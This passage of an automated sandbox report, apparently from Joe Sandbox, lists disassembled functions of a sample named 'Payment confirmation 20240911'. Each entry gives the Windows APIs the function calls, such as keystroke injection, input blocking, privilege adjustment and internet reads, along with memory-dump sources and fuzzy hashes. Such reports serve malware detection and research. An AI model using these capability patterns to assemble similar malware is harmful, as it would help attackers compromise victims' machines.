                                          • Opcode Fuzzy Hash: f37038762435296dde5367be85f645665007104c68181ba6ee583e46506bf828
                                          • Instruction Fuzzy Hash: 9811CD719012287AD73067A5AC4DFDBBABCEF45764F104199F504E71D0D2745E808BA4
                                          Function 0132220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0132221E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: 523efa8dd787eba415ec6671fc7f9a11e5b8c19f98196b2f26088a7b924ed44e
                                          • Instruction ID: c0a8dba1bd59834263e67794833e309b91ea07f7dfb218829c1ceccf6a436faa
                                          • Opcode Fuzzy Hash: 523efa8dd787eba415ec6671fc7f9a11e5b8c19f98196b2f26088a7b924ed44e
                                          • Instruction Fuzzy Hash: 3D323475A007159FCB28DF69C480A6AB7F0FF48324B11C46EE59ADB7A2E770E941CB44
                                          Function 012FAD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 012FAE5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LongProcWindow
                                          • String ID:
                                          • API String ID: 3265722593-0
                                          • Opcode ID: 76315bd0650d84e18d5e106fd6090c71400019fccc816f3bdad239cb7f538224
                                          • Instruction ID: 26679538df142dbdc30b4b3455a4c89504ed0f888fa627c54ab4416bb0c30358
                                          • Opcode Fuzzy Hash: 76315bd0650d84e18d5e106fd6090c71400019fccc816f3bdad239cb7f538224
                                          • Instruction Fuzzy Hash: AFA1D3A413420ABBEB28AE2D4C88D7FBD9DEF55B49F04463DFB0AD71D1CA559C018272
                                          Function 0133550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 013355FD
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01335629
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: 26ceb284abd54a308021f739902831ad09f5d958d2ea544be53b056710248452
                                          • Instruction ID: 7efd51c4660a43e5bbfb6f9ffdb39c12baddf121ba689f26aece43e30ad2e774
                                          • Opcode Fuzzy Hash: 26ceb284abd54a308021f739902831ad09f5d958d2ea544be53b056710248452
                                          • Instruction Fuzzy Hash: D9419471600209FFFB119E99DC84EBFB7FDEB8076CF10405AF606A6180DA71AE419B58
                                          Function 0132EB4B Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132EB5B
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0132EBB5
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0132EC02
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 10404bba9a82a6eb4df65d5a5fb2caf61e0795dc23ad18e7fce2a1d7598052bb
                                          • Instruction ID: 8e50c9eff155c3ee5645400f32b4198ae965424ee7db954514bd91e485bcce47
                                          • Opcode Fuzzy Hash: 10404bba9a82a6eb4df65d5a5fb2caf61e0795dc23ad18e7fce2a1d7598052bb
                                          • Instruction Fuzzy Hash: 87215C35A10218EFCB00EFA9D894AADFBB8FF59314F1480A9E946EB354DB31D905CB50
                                          Function 012E6670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 7ba37678527445d63284da940d10b509a39e5584fa943d44281f856f49086ad2
                                          • Instruction ID: e00612fffe2f01039aa4214679f57f8f92cc921cbbc5321f0ae442ae011896a3
                                          • Opcode Fuzzy Hash: 7ba37678527445d63284da940d10b509a39e5584fa943d44281f856f49086ad2
                                          • Instruction Fuzzy Hash: DCA2BCB0E10219CFDB28CF58C8846ADBBF1FF58314F65816AE919AB395D7709981CF90
                                          Function 0132FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0132FD71
                                          • FindClose.KERNEL32(00000000), ref: 0132FDA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: ab04b6d6b0cf80ed8539b593581ef568755f4be1f9d6138d281dbefb60576234
                                          • Instruction ID: 9bac621783a77df19aa8087e60475214f708336956fe3f5797042d01adab89df
                                          • Opcode Fuzzy Hash: ab04b6d6b0cf80ed8539b593581ef568755f4be1f9d6138d281dbefb60576234
                                          • Instruction Fuzzy Hash: 8711A1316102059FD710EF68D848A2AF7E8FF98324F00851EE9A9DB290DB74E8058B81
                                          Function 0132D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0133C2E2,?,?,00000000,?), ref: 0132D73F
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0133C2E2,?,?,00000000,?), ref: 0132D751
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 8ffc81a60991750a578a514f82b3267593bca4fb031766780e542560cdba1388
                                          • Instruction ID: 19e8135ffa330a3247d1951d24a0093b1d7b2981db285725c9d4c8cd32b00ecb
                                          • Opcode Fuzzy Hash: 8ffc81a60991750a578a514f82b3267593bca4fb031766780e542560cdba1388
                                          • Instruction Fuzzy Hash: 40F08C3510032DABDB21AEE8CC48FEA77ACAF497A5F008115F989D6185D6309A80CBA0
                                          Function 01324B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C), ref: 01324B89
                                          • keybd_event.USER32 ref: 01324B9C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InputSendkeybd_event
                                          • String ID:
                                          • API String ID: 3536248340-0
                                          • Opcode ID: 5b2e22e06a0efa6d4f218eb28be30ae26dc8db3edaec73ea76d7cdd1e02f0302
                                          • Instruction ID: 5434ed2a73805f6038e76c8f2893681c34b317f4e5c039be0a25874020145cbf
                                          • Opcode Fuzzy Hash: 5b2e22e06a0efa6d4f218eb28be30ae26dc8db3edaec73ea76d7cdd1e02f0302
                                          • Instruction Fuzzy Hash: DAF06D7090024DAFEB059FA5C805BBE7FB4AF00309F00C40AFA91A5191D37986159F94
                                          Function 0131B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0131B9EC), ref: 0131B8C5
                                          • CloseHandle.KERNEL32(?), ref: 0131B8D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 60606e6ef253f04cfa7109555bf7a78f0211e3bae50f80dddde822b44a2ea61f
                                          • Instruction ID: fea5387b338d6d7e5084e4c654b18d3a809fbd9ce674ceafd372a19e149e9a3d
                                          • Opcode Fuzzy Hash: 60606e6ef253f04cfa7109555bf7a78f0211e3bae50f80dddde822b44a2ea61f
                                          • Instruction Fuzzy Hash: C3E0E676004511EFE72A2B54EC04D777BFDEF04355B11C459F59981474D7615CD0DB10
                                          Function 01308E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 01308E41
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 01308E4A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 71e39cb1ef460e05925b0877153400ca70281d81d658af4146436b2b7af2899a
                                          • Instruction ID: 9027973d7f4c3151f9929a9c656fbad478922589e92f071191d93a8740e8a417
                                          • Opcode Fuzzy Hash: 71e39cb1ef460e05925b0877153400ca70281d81d658af4146436b2b7af2899a
                                          • Instruction Fuzzy Hash: 29B09271244A08ABEA102BE1E80DB883F6CEB08B62F108010F65D440648B6354508F99
                                          Function 012F3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID:
                                          • API String ID: 3964851224-0
                                          • Opcode ID: 176be40cd88685623f1e01295918f9f59ceb47ac33369deccd43989511e9597e
                                          • Instruction ID: 39c26d9a4681709766e9f985b59fa4895dded59a02cad3d1b4c9bda564c4145b
                                          • Opcode Fuzzy Hash: 176be40cd88685623f1e01295918f9f59ceb47ac33369deccd43989511e9597e
                                          • Instruction Fuzzy Hash: D6925B70618342CFD724DF18C494B6AFBE1BF88308F54896DEA8A8B391D775E845CB52
                                          Function 0131113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84b644245dabdaa9ec8aff127d7c666b47b79cdc5d53dde6d31c501788fff778
                                          • Instruction ID: 6c0c018f67b4271848f9e1fb1250115e92f3e04e70cd9e6985b3cf59cfd9ed64
                                          • Opcode Fuzzy Hash: 84b644245dabdaa9ec8aff127d7c666b47b79cdc5d53dde6d31c501788fff778
                                          • Instruction Fuzzy Hash: D0B1E120D2AF414DD63796398831336B65CBFBB2D5F91D71BFC2A74D1AEB2185834280
                                          Function 0133703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: f25516c74a8c0515750505f48cedc50f682814491221b56effe4470f4b0eb74e
                                          • Instruction ID: 372b90bb14c6caf9ec216e99b6421fc79e9fd6c5ef756b6802b9a95ec593fb8e
                                          • Opcode Fuzzy Hash: f25516c74a8c0515750505f48cedc50f682814491221b56effe4470f4b0eb74e
                                          • Instruction Fuzzy Hash: 5FE048753142059FC710DFA9D408D96F7EC9F94760F00C42AEA45D7251DAB1E8048B90
                                          Function 01327DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01327DF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: 495a8bbcfba1eb1241559d8df006e88fc0ada36af54818768bab040e9250876b
                                          • Instruction ID: e11cc44df28ab1845bc027b6358cd7c80dcc593b0e8f4444a7f3be6cff13a794
                                          • Opcode Fuzzy Hash: 495a8bbcfba1eb1241559d8df006e88fc0ada36af54818768bab040e9250876b
                                          • Instruction Fuzzy Hash: 6FD05EB717422A7AFE1827289C2FF3A350CF330A88FD08649F201C64C1ED9064015039
                                          Function 0135C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 5bbeed9ddeb136bfcce546df9d421002afc639a2dcc48db3694c619c3694d574
                                          • Instruction ID: 8e53b0beea9800eef56a722040ab466b84dbe5d1869a29f9451053e0491a49a2
                                          • Opcode Fuzzy Hash: 5bbeed9ddeb136bfcce546df9d421002afc639a2dcc48db3694c619c3694d574
                                          • Instruction Fuzzy Hash: 55C04CB140400DDFD755CBC0C945DEFB7BCBB04305F104095E155E1004D7709B458B71
                                          Function 0130A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(01306AE9,013967D8,00000014), ref: 0130A937
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: 167adbe3b6735b8c701404bbad51ec5e5a24a409c62f200ea4bfdfe5d9940bcd
                                          • Instruction ID: 75f646cc7c9ad991794e5aada8c408ad3d4a4976eadf0b88553c006ebe2f9186
                                          • Opcode Fuzzy Hash: 167adbe3b6735b8c701404bbad51ec5e5a24a409c62f200ea4bfdfe5d9940bcd
                                          • Instruction Fuzzy Hash: 07B012B03031028BDB5C4B38A45411A39DC5749301741803DF003C2564DB308420DF00
                                          Function 01300EC4 Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                          • Instruction ID: f7ddf552daa4f5ba0325a4461166026ef67acf891a8a6a8d5ce9f1f393f4c1fe
                                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                          • Instruction Fuzzy Hash: 38C184722091934AEF2F863EC47463EBFE15AA26F931A075DE4B3CB4C5EE24D164D610
                                          Function 013012F9 Relevance: .3, Instructions: 341COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                          • Instruction ID: a110f70bb58c283c11097963dd96e014f2eed08af63163e746eb251b0cec1050
                                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                          • Instruction Fuzzy Hash: F8C1C6722091934AEF2F463DC47453EBEE15AA27B931A076DE8B3CF4D5EE24C164D620
                                          Function 01300A8F Relevance: .3, Instructions: 331COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
